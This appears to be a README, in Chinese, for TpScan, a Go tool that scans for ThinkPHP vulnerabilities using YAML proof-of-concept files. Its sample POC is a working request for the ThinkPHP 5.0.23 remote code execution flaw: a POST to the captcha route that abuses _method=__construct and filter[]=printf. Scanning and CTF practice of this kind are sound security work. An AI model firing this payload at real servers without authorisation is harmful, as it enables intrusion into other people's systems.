☃️What

使用golang编写的ThinkPHP扫描器，POC采用ymal文件加载

🤪How

• 单个URL测试

./TpScan.exe -u http://node4.buuoj.cn:26433/

• 批量URL测试

./TpScan.exe -f test.txt

🤑About

• Ymal文件格式

  name: 5.0.23-Rce
  rules:
    r1:
      request:
        method: POST
        headers:
          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
        path: /index.php?s=captcha
        body: _method=__construct&filter[]=printf&method=GET&server[REQUEST_METHOD]=randomStr
      expression:
  #      result: and
  #      response_status: 404
        inResponse: |
          randomStr
  
    r2:
      request:
  #支持POST和GET    
        method: POST
        headers:
          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
        path: _method=__construct&filter[]=printf&method=GET&server[REQUEST_METHOD]=randomStr
        FollowRedirects: true
  #允许302跳转，默认为true
      expression:
  # r2验证结果为 response_status == 404 && inResponse(randomStr)
  #      result: and
  #      result: or
  #      response_status: 404
        inResponse: |
          randomStr
  #randomStr为占位符，会被自动替换为10位随机字符
  
  expression:
    r1 || r2
  #  r1 && r2
  #支持逻辑运算
  
  
  # 信息部分
  detail:
    author: Captain686
    links:
      - https://github.com/captain686

  在Xray的poc格式基础上进行部分修改

  Poc文件存放在User_Exploit目录下

😎ToDo

• 后续更新Poc文件